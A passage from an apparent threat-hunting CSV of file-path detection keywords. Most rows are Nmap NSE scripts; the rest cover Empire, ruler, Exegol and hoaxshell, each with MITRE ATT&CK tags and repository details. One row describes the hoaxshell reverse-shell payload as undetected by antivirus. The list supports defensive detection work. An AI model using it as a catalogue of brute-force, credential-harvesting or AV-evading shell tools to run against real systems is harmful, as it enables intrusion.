T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-date.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-default-accounts.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-devframework.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-dlink-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-dombased-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-domino-enum-passwords.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-drupal-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-drupal-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-errors.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-exif-spider.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-favicon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-feed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-fetch.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-fileupload-exploiter.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-form-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-form-fuzzer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-frontpage-login.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-generator.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-git.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-gitweb-projects-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-google-malware.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-grep.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-hp-ilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-huawei-hg5xx-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-icloud-findmyiphone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-icloud-sendmsg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-iis-short-name-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-iis-webdav-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-internal-ip-disclosure.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-joomla-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-jsonp-detection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-lexmark-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" +"*/http-lfi.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"*/http-litespeed-sourcecode-download.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/http-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-majordomo2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-malware-host.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-mcmp.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-method-tamper.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-mobileversion-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-nikto-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"*/http-ntlm/ntlmtransport*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/http-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-open-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-passwd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-phpmyadmin-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-phpself-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-php-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-proxy-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-put.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-put-server.py*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/http-qnap-nas-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-referer-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-rfi-spider.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-robots.txt.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-robtex-reverse-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-robtex-shared-ns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/https_payload.ps1*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" +"*/http-sap-netweaver-leak.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-security-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-server-header.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - 